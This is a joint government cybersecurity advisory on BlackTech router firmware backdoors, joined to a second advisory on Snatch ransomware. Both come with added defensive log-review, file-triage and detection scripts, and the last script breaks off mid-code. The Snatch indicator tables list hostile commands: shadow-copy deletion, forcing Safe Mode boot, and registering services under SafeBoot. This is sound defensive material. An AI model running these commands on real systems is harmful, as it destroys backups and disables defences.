The information in this report is being provided “as is” for informational purposes only. CISA and FBI do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA and FBI.
[1] GitHub sysdream | ligolo repository
[2] GitHub jpillora | chisel repository
[3] GitHub BishopFox | sliver repository
The United States National Security Agency (NSA), the U.S. Federal Bureau of Investigation (FBI), the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the Japan National Police Agency (NPA), and the Japan National Center of Incident Readiness and Strategy for Cybersecurity (NISC) (hereafter referred to as the “authoring agencies”) are releasing this joint cybersecurity advisory (CSA) to detail activity of the People’s Republic of China (PRC)-linked cyber actors known as BlackTech. BlackTech has demonstrated capabilities in modifying router firmware without detection and exploiting routers’ domain-trust relationships for pivoting from international subsidiaries to headquarters in Japan and the U.S. — the primary targets. The authoring agencies recommend implementing the mitigations described to detect this activity and protect devices from the backdoors the BlackTech actors are leaving behind.
BlackTech (a.k.a. Palmerworm, Temp.Overboard, Circuit Panda, and Radio Panda) actors have targeted government, industrial, technology, media, electronics, and telecommunication sectors, including entities that support the militaries of the U.S. and Japan. BlackTech actors use custom malware, dual-use tools, and living off the land tactics, such as disabling logging on routers, to conceal their operations. This CSA details BlackTech’s tactics, techniques, and procedures (TTPs), which highlights the need for multinational corporations to review all subsidiary connections, verify access, and consider implementing Zero Trust models to limit the extent of a potential BlackTech compromise.
For more information on the risks posed by this deep level of unauthorized access, see the CSA People’s Republic of China State-Sponsored Cyber Actors Exploit Network Providers and Devices.[1]
Download the PDF version of this report: PDF, 808 KB
This advisory uses the MITRE® ATT&CK® for Enterprise framework, version 13.1. See the Appendix: MITRE ATT&CK Techniques for all referenced TTPs.
Active since 2010, BlackTech actors have historically targeted a wide range of U.S. and East Asia public organizations and private industries. BlackTech actors’ TTPs include developing customized malware and tailored persistence mechanisms for compromising routers. These TTPs allow the actors to disable logging [T1562] and abuse trusted domain relationships [T1199] to pivot between international subsidiaries and domestic headquarters’ networks.
BlackTech cyber actors use custom malware payloads and remote access tools (RATs) to target victims’ operating systems. The actors have used a range of custom malware families targeting Windows®, Linux®, and FreeBSD® operating systems. Custom malware families employed by BlackTech include:
BlackTech actors continuously update these tools to evade detection [TA0005] by security software. The actors also use stolen code-signing certificates [T1588.003] to sign the malicious payloads, which make them appear legitimate and therefore more difficult for security software to detect [T1553.002].
BlackTech actors use living off the land TTPs to blend in with normal operating system and network activities, allowing them to evade detection by endpoint detection and response (EDR) products. Common methods of persistence on a host include NetCat shells, modifying the victim registry [T1112] to enable the remote desktop protocol (RDP) [T1021.001], and secure shell (SSH) [T1021.004]. The actors have also used SNScan for enumeration [TA0007], and a local file transfer protocol (FTP) server [T1071.002] to move data through the victim network. For additional examples of malicious cyber actors living off the land, see People's Republic of China State-Sponsored Cyber Actor Living off the Land to Evade Detection.[2]
The PRC-linked BlackTech actors target international subsidiaries of U.S. and Japanese companies. After gaining access [TA0001] to the subsidiaries’ internal networks, BlackTech actors are able to pivot from the trusted internal routers to other subsidiaries of the companies and the headquarters’ networks. BlackTech actors exploit trusted network relationships between an established victim and other entities to expand their access in target networks.
Specifically, upon gaining an initial foothold into a target network and gaining administrator access to network edge devices, BlackTech cyber actors often modify the firmware to hide their activity across the edge devices to further maintain persistence in the network. To extend their foothold across an organization, BlackTech actors target branch routers—typically smaller appliances used at remote branch offices to connect to a corporate headquarters—and then abuse the trusted relationship [T1199] of the branch routers within the corporate network being targeted. BlackTech actors then use the compromised public-facing branch routers as part of their infrastructure for proxying traffic [TA0011], blending in with corporate network traffic, and pivoting to other victims on the same corporate network [T1090.002].
BlackTech has targeted and exploited various brands and versions of router devices. TTPs against routers enable the actors to conceal configuration changes, hide commands, and disable logging while BlackTech actors conduct operations. BlackTech actors have compromised several Cisco® routers using variations of a customized firmware backdoor [T1542.004]. The backdoor functionality is enabled and disabled through specially crafted TCP or UDP packets [T1205]. This TTP is not solely limited to Cisco routers, and similar techniques could be used to enable backdoors in other network equipment.
In some cases, BlackTech actors replace the firmware for certain Cisco IOS®-based routers with malicious firmware. Although BlackTech actors already had elevated privileges [TA0004] on the router to replace the firmware via command-line execution, the malicious firmware is used to establish persistent backdoor access [TA0003] and obfuscate future malicious activity. The modified firmware uses a built-in SSH backdoor [T1556.004], allowing BlackTech actors to maintain access to the compromised router without BlackTech connections being logged [T1562.003]. BlackTech actors bypass the router's built-in security features by first installing older legitimate firmware [T1601.002] that they then modify in memory to allow the installation of a modified, unsigned bootloader and modified, unsigned firmware [T1601.001]. The modified bootloader enables the modified firmware to continue evading detection [T1553.006]; however, it is not always necessary.
BlackTech actors may also hide their presence and obfuscate changes made to compromised Cisco routers by hiding Embedded Event Manager (EEM) policies—a feature usually used in Cisco IOS to automate tasks that execute upon specified events—that manipulate Cisco IOS Command-Line Interface (CLI) command results. On a compromised router, the BlackTech-created EEM policy waits for specific commands to execute obfuscation measures or deny execution of specified legitimate commands. This policy has two functions: (1) to remove lines containing certain strings in the output of specified, legitimate Cisco IOS CLI commands [T1562.006], and (2) prevent the execution of other legitimate CLI commands, such as hindering forensic analysis by blocking copy, rename, and move commands for the associated EEM policy [T1562.001].
BlackTech actors utilize the following file types to compromise the router. These files are downloaded to the router via FTP or SSH.

File Type | Description
---|---
Old Legitimate Firmware | The IOS image firmware is modified in memory to allow installation of the Modified Firmware and Modified Bootloader.
Modified Firmware | The firmware has a built-in SSH backdoor, allowing operators to have unlogged interaction with the router.
Modified Bootloader | The bootloader allows Modified Firmware to continue evading the router's security features for persistence across reboots. In some cases, only modified firmware is used.
BlackTech actors use the Cisco router's CLI to replace the router’s IOS image firmware. The process begins with the firmware being modified in memory—also called hot patching—to allow the installation of a modified bootloader and modified firmware capable of bypassing the router’s security features. Then, a specifically constructed packet triggers the router to enable the backdoor that bypasses logging and the access control list (ACL). The steps are as follows (only the CLI commands from the step list are recoverable here):
conf t
upgrade rom file bootloader
To allow the modified bootloader and firmware to be installed on Cisco IOS without detection, the cyber actors install an old, legitimate firmware and then modify that running firmware in memory to bypass firmware signature checks in the Cisco ROM Monitor (ROMMON) signature validation functions. The modified version’s instructions allow the actors to bypass functions of the IOS Image Load test and the Field Upgradeable ROMMON Integrity test.
BlackTech actors install modified IOS image firmware that allows backdoor access via SSH to bypass the router’s normal logging functions. The firmware consists of a Cisco IOS loader that will load an embedded IOS image.
BlackTech actors hook several functions in the embedded Cisco IOS image to jump to their own code. They overwrite existing code to handle magic packet checking, implement an SSH backdoor, and bypass logging functionality on the compromised router. The modified instructions bypass command logging, IP address ACLs, and error logging.
To enable the backdoor functions, the firmware checks for incoming trigger packets and enables or disables the backdoor functionality. When the backdoor is enabled, associated logging functions on the router are bypassed. The source IP address is stored and used to bypass ACL handling for matching packets. The SSH backdoor includes a special username that does not require additional authentication.
In order to detect and mitigate this BlackTech malicious activity, the authoring agencies strongly recommend the following detection and mitigation techniques. It would be trivial for the BlackTech actors to modify values in their backdoors that would render specific signatures of this router backdoor obsolete. For more robust detection, network defenders should monitor network devices for unauthorized downloads of bootloaders and firmware images and reboots. Network defenders should also monitor for unusual traffic destined to the router, including SSH.
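The detection advice above can be turned into a simple review of router syslog forwarded to a central collector: logins, configuration changes, and reloads from any source that is not a management host, plus reload and restart events themselves, which should be matched to a change ticket and followed by re-verifying the running image and bootloader. The script below is an added example, not tooling from the authoring agencies. Its syslog lines are constructed in the format Cisco IOS emits for %SEC_LOGIN-5-LOGIN_SUCCESS, %SYS-5-CONFIG_I, %SYS-5-RELOAD and %SYS-5-RESTART; the management allowlist, device inventory, and the year used to parse the year-less syslog timestamps are assumptions. A second check lists devices that have gone quiet, because a backdoored router whose logging is bypassed may simply stop reporting.

```python
import re
from datetime import datetime, timedelta

# Constructed syslog lines as received by a central collector (not data from the advisory).
# Layout: collector timestamp, device hostname, IOS sequence number, IOS timestamp, mnemonic, message.
SAMPLE_SYSLOG = """\
Jun 01 10:00:01 br-router-01 45: *Jun  1 10:00:01.110: %SEC_LOGIN-5-LOGIN_SUCCESS: Login Success [user: netops] [Source: 10.10.0.5] [localport: 22] at 10:00:01 UTC Thu Jun 1 2023
Jun 01 10:05:12 br-router-01 46: *Jun  1 10:05:12.004: %SEC_LOGIN-5-LOGIN_SUCCESS: Login Success [user: admin] [Source: 192.0.2.77] [localport: 22] at 10:05:12 UTC Thu Jun 1 2023
Jun 01 10:06:40 br-router-01 47: *Jun  1 10:06:40.220: %SYS-5-CONFIG_I: Configured from console by admin on vty1 (192.0.2.77)
Jun 01 10:09:03 br-router-01 48: *Jun  1 10:09:03.900: %SYS-5-RELOAD: Reload requested by admin on vty1 (192.0.2.77). Reload Reason: Reload Command.
Jun 01 10:11:30 br-router-01 1: *Jun  1 10:11:30.000: %SYS-5-RESTART: System restarted --
Jun 01 10:30:00 hq-core-01 9001: *Jun  1 10:30:00.500: %SYS-5-CONFIG_I: Configured from console by netops on vty0 (10.10.0.5)
"""

MGMT_SOURCES = {"10.10.0.5"}                                # assumption: only hosts allowed to manage routers
INVENTORY = ["br-router-01", "br-router-02", "hq-core-01"]  # assumption: devices that should be logging
SYSLOG_YEAR = 2023                                          # collector timestamps carry no year
REFERENCE_NOW = "Jun 01 15:00:00"                           # "now" for the quiet-device check, same format

LINE_RE = re.compile(
    r"^(?P<recv>\w{3} \d{2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) (?P<seq>\d+): "
    r"[^%]*(?P<mnemonic>%[A-Z_]+-\d-[A-Z_]+): (?P<msg>.*)$"
)
# Source address appears as "[Source: a.b.c.d]" in login messages and "(a.b.c.d)" in CONFIG_I/RELOAD.
SRC_RE = re.compile(r"(?:\[Source: |\()(?P<ip>\d{1,3}(?:\.\d{1,3}){3})[\]\)]")

def parse(line):
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    s = SRC_RE.search(rec["msg"])
    rec["source"] = s.group("ip") if s else None
    rec["time"] = datetime.strptime(f"{rec['recv']} {SYSLOG_YEAR}", "%b %d %H:%M:%S %Y")
    return rec

def review_router_logs(text, mgmt_sources=MGMT_SOURCES):
    """Return (host, seq, finding) tuples for events a defender should examine."""
    findings = []
    for line in text.splitlines():
        rec = parse(line)
        if not rec:
            continue
        mn, src, host, seq = rec["mnemonic"], rec["source"], rec["host"], rec["seq"]
        if src and src not in mgmt_sources:
            findings.append((host, seq, f"{mn} from non-management source {src}"))
        if mn == "%SYS-5-RELOAD":
            findings.append((host, seq, "reload requested: match to a change ticket"))
        if mn == "%SYS-5-RESTART":
            findings.append((host, seq, "device restarted: re-verify running image and bootloader against known-good hashes"))
    return findings

def silent_devices(text, inventory=INVENTORY, now_str=REFERENCE_NOW, max_quiet=timedelta(hours=6)):
    """Devices with no log line within max_quiet of now_str. On a router whose backdoor
    bypasses logging, silence itself is the signal; check it out of band."""
    now = datetime.strptime(f"{now_str} {SYSLOG_YEAR}", "%b %d %H:%M:%S %Y")
    last_seen = {}
    for line in text.splitlines():
        rec = parse(line)
        if rec:
            last_seen[rec["host"]] = max(rec["time"], last_seen.get(rec["host"], rec["time"]))
    return sorted(h for h in inventory if h not in last_seen or now - last_seen[h] > max_quiet)

if __name__ == "__main__":
    for host, seq, finding in review_router_logs(SAMPLE_SYSLOG):
        print(f"{host} #{seq}: {finding}")
    print("quiet devices:", silent_devices(SAMPLE_SYSLOG))
```

The sequence of events the sample shows, a login from an unexpected address followed within minutes by a configuration change and a reload, is exactly the firmware-replacement sequence described above seen from the log side; after the restart, the router's own logs can no longer be trusted, so the image check has to be done against a hash recorded before the event.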
The following are the best mitigation practices to defend against this type of malicious activity:
[1] Joint CSA, People’s Republic of China State-Sponsored Cyber Actors Exploit Network Providers and Devices, https://media.defense.gov/2022/Jun/07/2003013376/-1/-1/0/CSA_PRC_SPONSORED_CYBER_ACTORS_EXPLOIT_NETWORK_PROVIDERS_DEVICES_TLPWHITE.PDF
[2] Joint CSA, People's Republic of China State-Sponsored Cyber Actor Living off the Land to Evade Detection, https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_PRC_State_Sponsored_Cyber_Living_off_the_Land_v1.1.PDF
[3] NSA, Network Infrastructure Security Guide, https://media.defense.gov/2022/Jun/15/2003018261/-1/-1/0/CTR_NSA_NETWORK_INFRASTRUCTURE_SECURITY_GUIDE_20220615.PDF
[4] NSA, Performing Out-of-Band Network Management, https://media.defense.gov/2020/Sep/17/2002499616/-1/-1/0/PERFORMING_OUT_OF_BAND_NETWORK_MANAGEMENT20200911.PDF
[5] Cisco, Attackers Continue to Target Legacy Devices, https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
The information and opinions contained in this document are provided "as is" and without any warranties or guarantees. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the United States Government or Japan, and this guidance shall not be used for advertising or product endorsement purposes.
Cisco and Cisco IOS are registered trademarks of Cisco Technology, Inc.
FreeBSD is a registered trademark of The FreeBSD Foundation.
Linux is a registered trademark of Linus Torvalds.
MITRE and MITRE ATT&CK are registered trademarks of The MITRE Corporation.
Windows is a registered trademark of Microsoft Corporation.
This document was developed in furtherance of the authoring agencies’ cybersecurity missions, including their responsibilities to identify and disseminate cyber threats, and to develop and issue cybersecurity specifications and mitigations.
NSA Cybersecurity Report Questions and Feedback: [email protected]
NSA’s Defense Industrial Base Inquiries and Cybersecurity Services: [email protected]
NSA Media Inquiries / Press Desk: 443-634-0721, [email protected]
U.S. organizations: Report incidents and anomalous activity to CISA 24/7 Operations Center at [email protected], cisa.gov/report, or (888) 282-0870 and/or to the FBI via your local FBI field office.
See Tables 2-9 for all referenced BlackTech tactics and techniques in this advisory.
Table 2: Resource Development

Technique Title | ID | Use
---|---|---
Obtain Capabilities: Code Signing Certificates | T1588.003 | BlackTech actors use stolen code-signing certificates to sign payloads and evade defenses.

Table 3: Initial Access

Technique Title | ID | Use
---|---|---
Initial Access | TA0001 | BlackTech actors gain access to victim networks by exploiting routers.
Trusted Relationship | T1199 | BlackTech actors exploit trusted domain relationships of routers to gain access to victim networks.

Table 4: Persistence

Technique Title | ID | Use
---|---|---
Persistence | TA0003 | BlackTech actors gain persistent access to victims’ networks.
Traffic Signaling | T1205 | BlackTech actors send specially crafted packets to enable or disable backdoor functionality on a compromised router.
Pre-OS Boot: ROMMONkit | T1542.004 | BlackTech actors modify router firmware to maintain persistence.

Table 5: Privilege Escalation

Technique Title | ID | Use
---|---|---
Privilege Escalation | TA0004 | BlackTech actors gain elevated privileges on a victim’s network.

Table 6: Defense Evasion

Technique Title | ID | Use
---|---|---
Defense Evasion | TA0005 | BlackTech actors configure their tools to evade detection by security software and EDR.
Modify Registry | T1112 | BlackTech actors modify the victim’s registry.
Impair Defenses | T1562 | BlackTech actors disable logging on compromised routers to avoid detection and evade defenses.
Impair Defenses: Impair Command History Logging | T1562.003 | BlackTech actors disable logging on the compromised routers to prevent logging of any commands issued.
Modify System Image: Patch System Image | T1601.001 | BlackTech actors modify router firmware to evade detection.

Table 7: Discovery

Technique Title | ID | Use
---|---|---
Discovery | TA0007 | BlackTech actors use SNScan to enumerate victims’ networks and obtain further network information.

Table 8: Lateral Movement

Technique Title | ID | Use
---|---|---
Remote Services: Remote Desktop Protocol | T1021.001 | BlackTech actors use RDP to move laterally across a victim’s network.
Remote Services: SSH | T1021.004 | BlackTech actors use SSH to move laterally across a victim’s network.

Table 9: Command and Control

Technique Title | ID | Use
---|---|---
Command and Control | TA0011 | BlackTech actors compromise and control a victim’s network infrastructure.
Application Layer Protocol: File Transfer Protocols | T1071.002 | BlackTech actors use FTP to move data through a victim’s network or to deliver scripts for compromising routers.
Proxy | T1090 | BlackTech actors use compromised routers to proxy traffic.
The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint CSA to disseminate known ransomware IOCs and TTPs associated with the Snatch ransomware variant identified through FBI investigations as recently as June 1, 2023.
Since mid-2021, Snatch threat actors have consistently evolved their tactics to take advantage of current trends in the cybercriminal space and leveraged successes of other ransomware variants’ operations. Snatch threat actors have targeted a wide range of critical infrastructure sectors including the Defense Industrial Base (DIB), Food and Agriculture, and Information Technology sectors. Snatch threat actors conduct ransomware operations involving data exfiltration and double extortion. After data exfiltration often involving direct communications with victims demanding ransom, Snatch threat actors may threaten victims with double extortion, where the victims’ data will be posted on Snatch’s extortion blog if the ransom goes unpaid.
FBI and CISA encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of ransomware incidents.
Note: This advisory uses the MITRE ATT&CK for Enterprise framework, version 13. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK® tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.
First appearing in 2018, Snatch operates a ransomware-as-a-service (RaaS) model and claimed their first U.S.-based victim in 2019. Originally, the group was referred to as Team Truniger, based on the nickname of a key group member, Truniger, who previously operated as a GandCrab affiliate. Snatch threat actors use a customized ransomware variant notable for rebooting devices into Safe Mode [T1562.009], enabling the ransomware to circumvent detection by antivirus or endpoint protection, and then encrypting files when few services are running.
Snatch threat actors have been observed purchasing previously stolen data from other ransomware variants in an attempt to further exploit victims into paying a ransom to avoid having their data released on Snatch’s extortion blog. Note: Since November 2021, an extortion site operating under the name Snatch served as a clearinghouse for data exfiltrated or stolen from victim companies on Clearnet and TOR hosted by a bulletproof hosting service. In August 2023, individuals claiming to be associated with the blog gave a media interview claiming the blog was not associated with Snatch ransomware and “none of our targets has been attacked by Ransomware Snatch…”, despite multiple confirmed Snatch victims’ data appearing on the blog alongside victims associated with other ransomware groups, notably Nokoyawa and Conti.[1]
Snatch threat actors employ several different methods to gain access to and maintain persistence on a victim’s network. Snatch affiliates primarily rely on exploiting weaknesses in Remote Desktop Protocol (RDP) [T1133] for brute-forcing and gaining administrator credentials to victims’ networks [T1110.001]. In some instances, Snatch affiliates have sought out compromised credentials from criminal forums/marketplaces [T1078].
Snatch threat actors gain persistence on a victim’s network by compromising an administrator account [T1078.002] and establishing connections over port 443 [T1071.001] to a command and control (C2) server located on a Russian bulletproof hosting service [T1583.003]. Per IP traffic from event logs provided by recent victims, Snatch threat actors initiated RDP connections from a Russian bulletproof hosting service and through other virtual private network (VPN) services [T1133].
Snatch threat actors were observed using different TTPs to discover data, move laterally, and search for data to exfiltrate. Snatch threat actors use sc.exe to configure, query, stop, start, delete, and add system services from the Windows command line. In addition to sc.exe, Snatch threat actors also use tools such as Metasploit and Cobalt Strike [S0154].
Prior to deploying the ransomware, Snatch threat actors were observed spending up to three months on a victim’s system. Within this timeframe, Snatch threat actors exploited the victim’s network [T1590], moving laterally across the victim’s network with RDP [T1021.001] for the largest possible deployment of ransomware and searching for files and folders [T1005] for data exfiltration [TA0010] followed by file encryption [T1486].
During the early stages of ransomware deployment, Snatch threat actors attempt to disable antivirus software [T1562.001] and run an executable as a file named safe.exe or some variation thereof. In recent victims, the ransomware executable’s name consisted of a string of hexadecimal characters matching the SHA-256 hash of the file itself, in an effort to defeat rule-based detection [T1036]. Upon initiation, the Snatch ransomware payload queries and modifies registry keys [T1012][T1112], uses various native Windows tools to enumerate the system [T1569.002], finds processes [T1057], and creates benign processes to execute Windows batch (.bat) files [T1059.003]. In some instances, the program attempts to remove all volume shadow copies from the system [T1490]. After the batch files execute, the executable removes them from the victim’s filesystem [T1070.004].
The Snatch ransomware executable appends a series of hexadecimal characters to each file and folder name it encrypts, unique to each infection, and leaves behind a text file titled HOW TO RESTORE YOUR FILES.TXT in each folder. Snatch threat actors communicate with their victims through email and the Tox communication platform based on identifiers left in ransom notes, or through their extortion blog. Since November 2021, some victims reported receiving a spoofed call from an unknown female who claimed association with Snatch and directed them to the group’s extortion site. In some instances, Snatch victims had a different ransomware variant deployed on their systems but received a ransom note from Snatch threat actors. As a result, the victims’ data is posted both on the blog associated with the other ransomware variant and on the Snatch threat actors’ extortion blog.
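The file artifacts described above (the safe.exe variants, an executable named after its own SHA-256, and the ransom note dropped in every folder) can be triaged mechanically. The Python below is an added example and not code from the advisory: it hashes every file under a directory, matches the digests against a list of known-bad SHA-256 values, flags any executable whose filename stem equals its own SHA-256 (the masquerading trick the text describes), and flags the ransom-note filename. The IOC list passed in and the sample directory it builds are constructed for this example; in practice, feed it the hashes from the tables that follow.

```python
"""Triage a directory for Snatch-style file artifacts (added example, not advisory code)."""
import hashlib
import re
import tempfile
from pathlib import Path

HEX64 = re.compile(r"^[0-9a-f]{64}$", re.IGNORECASE)
RANSOM_NOTE = "HOW TO RESTORE YOUR FILES.TXT"


def sha256_file(path: Path) -> str:
    """Stream the file so large binaries do not have to fit in memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def triage_dir(root, ioc_hashes):
    """Return a list of (path, reason) findings for every file under root.

    Reasons: 'ransom note', 'ioc hash <prefix>', 'filename equals own sha256'.
    """
    findings = []
    ioc = {h.lower() for h in ioc_hashes}
    for p in Path(root).rglob("*"):
        if not p.is_file():
            continue
        if p.name.upper() == RANSOM_NOTE:
            findings.append((str(p), "ransom note"))
            continue
        digest = sha256_file(p)
        if digest in ioc:
            findings.append((str(p), f"ioc hash {digest[:12]}"))
        # Masquerade heuristic from the advisory: the stem is a 64-hex string
        # and it is exactly the file's own SHA-256.
        if HEX64.match(p.stem) and p.stem.lower() == digest:
            findings.append((str(p), "filename equals own sha256"))
    return findings


def build_sample_tree():
    """Construct a throwaway directory exercising each rule (constructed data, not real samples).

    Returns (root_path, sha256_of_the_fake_payload) so callers can feed the hash in as an IOC.
    """
    root = Path(tempfile.mkdtemp(prefix="snatch-triage-"))
    payload = root / "safe.exe"
    payload.write_bytes(b"MZ constructed fake payload for the ioc rule")
    # Same bytes, renamed after their own hash, as the advisory describes.
    self_named = root / (sha256_file(payload) + ".exe")
    self_named.write_bytes(payload.read_bytes())
    (root / RANSOM_NOTE).write_text("constructed ransom note")
    (root / "benign.txt").write_text("nothing to see here")
    return root, sha256_file(payload)


if __name__ == "__main__":
    sample_root, payload_hash = build_sample_tree()
    for path, reason in triage_dir(sample_root, [payload_hash]):
        print(f"{reason:28s} {path}")
```

The self-named copy is reported twice, once because its hash is on the IOC list and once because its name is its own hash; the second reason keeps working after the actors rebuild the payload and the hash list goes stale.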
The Snatch IOCs detailed in this section were obtained through FBI investigations from September 2022 through June 2023.
Since 2019, Snatch threat actors have used numerous email addresses to email victims. Email addresses used by Snatch threat actors are random but usually originate from one of the following domains listed in Tables 1 and 2:
| Email Domains |
|---|
| sezname[.]cz |
| cock[.]li |
| airmail[.]cc |
Table 2 shows a list of legitimate email domains offering encrypted email services that have been used by Snatch threat actors. These email domains are all publicly available and legal. The use of these email domains by a threat actor should not be attributed to the email domains, absent specific articulable facts tending to show they are used at the direction or under the control of a threat actor.
| Email Domains |
|---|
| tutanota[.]com / tutamail[.]com / tuta[.]io |
| mail[.]fr |
| keemail[.]me |
| protonmail[.]com / proton[.]me |
| swisscows[.]email |
The email addresses listed in Table 3 were reported by recent victims.
| Email Addresses |
|---|

| TOX Messaging IDs |
|---|
| CAB3D74D1DADE95B52928E4D9DFC003FF5ADB2E082F59377D049A91952E8BB3B419DB2FA9D3F |
| 7229828E766B9058D329B2B4BC0EDDD11612CBCCFA4811532CABC76ACF703074E0D1501F8418 |
| 83E6E3CFEC0E4C8E7F7B6E01F6E86CF70AE8D4E75A59126A2C52FE9F568B4072CA78EF2B3C97 |
| 0FF26770BFAEAD95194506E6970CC1C395B04159038D785DE316F05CE6DE67324C6038727A58 (Note: according to ransom notes, this is a “Customer service” TOX ID to contact if the original TOX ID does not respond.) |

| Folder Creation |
|---|
| C:\$SysReset |
| Filenames | SHA-256 |
|---|---|
| qesbdksdvnotrjnexutx.bat | 0965cb8ee38adedd9ba06bdad9220a35890c2df0e4c78d0559cd6da653bf740f |
| eqbglqcngblqnl.bat | 1fbdb97893d09d59575c3ef95df3c929fe6b6ddf1b273283e4efadf94cdc802d |
| safe.exe | 5950b4e27554585123d7fca44e83169375c6001201e3bf26e57d079437e70bcd |
| safe.exe | 7018240d67fd11847c7f9737eaaae45794b37a5c27ffd02beaacaf6ae13352b3 |
| safe.exe | 28e82f28d0b9eb6a53d22983e21a9505ada925ebb61382fabebd76b8c4acff7c |
| safe.exe | fc31043b5f079ce88385883668eeebba76a62f77954a960fb03bf46f47dbb066 |
| DefenderControl.exe | a201f7f81277e28c0bdd680427b979aee70e42e8a98c67f11e7c83d02f8fe7ae |
| PRETTYOCEANApplicationdrs.bi | 6992aaad3c47b938309fc1e6f37179eb51f028536f8afc02e4986312e29220c0 |
| Setup.exe | 510e9fa38a08d446189c34fe6125295f410b36f00aceb65e7b4508e9d7c4e1d1 |
| WRSA.exe | ed0fd61bf82660a69f5bfe0e66457cfe56d66dd2b310e9e97657c37779aef65d |
| ghnhfglwaplf.bat | 2155a029a024a2ffa4eff9108ac15c7db527ca1c8f89ccfd94cc3a70b77cfc57 |
| nllraq.bat | 251427c578eaa814f07037fbe6e388b3bc86ed3800d7887c9d24e7b94176e30d |
| ygariiwfenmqteiwcr.bat | 3295f5029f9c9549a584fa13bc6c25520b4ff9a4b2feb1d9e935cc9e4e0f0924 |
| bsfyqgqeauegwyfvtp.bat | 6c9d8c577dddf9cc480f330617e263a6ee4461651b4dec1f7215bda77df911e7 |
| rgibdcghzwpk.bat | 84e1476c6b21531de62bbac67e52ab2ac14aa7a30f504ecf33e6b62aa33d1fe5 |
| pxyicmajjlqrtgcnhi.bat | a80c7fe1f88cf24ad4c55910a9f2189f1eedad25d7d0fd53dbfe6bdd68912a84 |
| evhgpp.bat | b998a8c15cc19c8c31c89b30f692a40b14d7a6c09233eb976c07f19a84eccb40 |
| HOW TO RESTORE YOUR FILES.TXT | |

| Filenames | SHA-1 |
|---|---|
| safe.exe | c8a0060290715f266c89a21480fed08133ea2614 |
| Commands |
|---|
| wmiadap.exe /F /T /R |
| %windir%\System32\svchost.eve -k WerSvcGroup |
| conhost.exe 0xFFFFFFFF -ForceV1 |
| vssadmin delete shadows /all /quiet |
| bcdedit.exe /set {current} safeboot minimal |
| REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\VSS /VE /T REG_SZ /F /D Service |
| REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mXoRpcSsx /VE /T REG_SZ /F /D Service |
| REG QUERY HKLM\SYSTEM\CurrentControlSet\Control /v SystemStartOptions |
| %CONHOST% "1088015358-1778111623-1306428145949291561678876491840500802412316031-33820320 |
| "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --flag-switches-begin --flag-switches-end --no-startup-window /prefetch:5 |
| cmd /d /c cmd /d /c cmd /d /c start " " C:\Users\grade1\AppData\Local\PRETTYOCEANluv\Application\PRETTYOCEANApplicationidf.bi. |

| Registry Keys |
|---|
| HKLM\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Servers\D8B548F0-E306-4B2B-BD82-25DAC3208786\FriendlyName |
| HKU\S-1-5-21-4270068108-2931534202-3907561125-1001\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{ED50FC29-B964- |

| Source | Message |
|---|---|
| TerminalServices-RemoteConnectionManager | Remote session from client name exceeded the maximum allowed failed logon attempts. The session was forcibly terminated. |
| Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall | A rule was added (Event 2004) or modified (Event 2005) in the Windows Defender Firewall exception list. All rules included the action “Allow” and a rule name including “File and Printer Sharing”. |
| Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall | A Windows Defender Firewall setting was changed in the private, public, and domain profiles with type “Enable Windows Defender Firewall” and value “no”. |
| Microsoft-Windows-TaskScheduler%4Operational | Instance of process C:\Windows\svchost.exe (incorrect file location; the legitimate binary is C:\Windows\System32\svchost.exe). |

| Mutexes Created |
|---|
| \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-fc_key |
| \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-sjlj_once |
| \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-use_fc_key |
| gcc-shmem-tdm2-fc_key |
| gcc-hmem-tdm2-sjlj_once |
| gcc-shmem-tdm2-use_fc_key |

Note: the gcc-shmem-tdm2-* named objects are created by the runtime of binaries built with the TDM-GCC/MinGW toolchain, so they also appear for benign software compiled that way. Treat them as corroborating evidence alongside the commands and registry changes above, not as a standalone indicator.
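The commands and event-log entries in the tables above translate directly into host detections. The Python below is an added example, not code from the advisory: it defines one rule per behaviour (bcdedit setting safeboot, a service registered under SafeBoot\Minimal, shadow-copy deletion, svchost.exe running from outside System32, the firewall being switched off, and an “Allow” rule for File and Printer Sharing) and evaluates them over constructed process-creation and firewall events. The field names Image, CommandLine, Provider, EventID, RuleName, Action and Message are assumptions modelled on Sysmon and Windows Firewall logging; map them to your own schema. The REG ADD to SafeBoot\Minimal is the step worth understanding: a service registered there is started in Safe Mode, which is how the ransomware keeps running after the reboot while most antivirus and EDR services do not.

```python
"""Detection rules for the Snatch host artifacts above (added example, not advisory code)."""
import re

FW_PROVIDER = "Microsoft-Windows-Windows Firewall With Advanced Security"
# REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\<svc> ... registers a
# service to start in Safe Mode. Matched case-insensitively on the lowercased command line.
SAFEBOOT_REG = re.compile(
    r"reg(?:\.exe)?\s+add\s+hklm\\system\\currentcontrolset\\control\\safeboot\\minimal\\"
)
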